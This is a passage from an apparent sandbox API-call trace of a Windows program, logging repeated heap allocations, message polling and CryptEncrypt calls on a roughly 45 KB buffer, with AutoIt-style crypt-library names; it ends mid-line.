[0199.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0199.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0199.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0199.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0199.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0199.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0199.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0199.496] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0199.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0199.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0199.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0199.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0199.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0199.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0199.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0199.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0199.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0199.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0199.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0199.497] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0199.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd708 [0199.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0199.497] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0199.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0199.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0199.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0199.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0199.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0199.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0199.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0199.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0199.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0199.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0199.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0199.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0199.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0199.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0199.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0199.497] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0199.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0199.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0199.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0199.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0199.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0199.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0199.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0199.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0199.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0199.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0199.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0199.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0199.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0199.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0199.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0199.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0199.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0199.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0199.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0199.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0199.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0199.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0199.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0199.498] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0199.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0199.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0199.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0199.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0199.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0199.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0199.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0199.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0199.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0199.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0199.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0199.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0199.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0199.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0199.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0199.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0199.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0199.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0199.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0199.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0199.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0199.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0199.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0199.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0199.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0199.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0199.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0199.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0199.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0199.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0199.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0199.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0199.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0199.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0199.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0199.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0199.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0199.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0199.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0199.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0199.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0199.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0199.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0199.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0199.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0199.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0199.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0199.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0199.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0199.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0199.500] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0199.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0199.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0199.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0199.501] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0199.501] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0199.501] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c27d8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27d8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0199.501] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.501] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.501] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.501] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.501] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.517] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0199.517] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.517] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.517] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0199.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0199.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0199.517] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.517] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0199.517] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0199.517] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0199.517] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.518] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0199.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0199.518] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.518] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0199.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0199.518] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.518] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.518] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.518] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0199.518] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.518] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0199.518] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.519] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.519] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xb336, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xb340) returned 1 [0199.519] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.520] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0199.520] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.520] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.520] CharLowerBuffW (in: lpsz="byte[45889]", cchLength=0xb | out: lpsz="byte[45889]") returned 0xb [0199.520] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.522] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.522] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0199.522] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0199.522] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.522] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa5f008*, pdwDataLen=0x87e820*=0xb336, dwBufLen=0xb340 | out: pbData=0xa5f008*, pdwDataLen=0x87e820*=0xb340) returned 1 [0199.522] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.522] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0199.523] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.524] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.524] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.524] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.524] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0199.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0199.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.524] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.524] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0199.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.525] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.525] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0199.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0199.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0199.525] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.525] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0199.525] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0199.525] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0199.525] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0199.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0199.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: 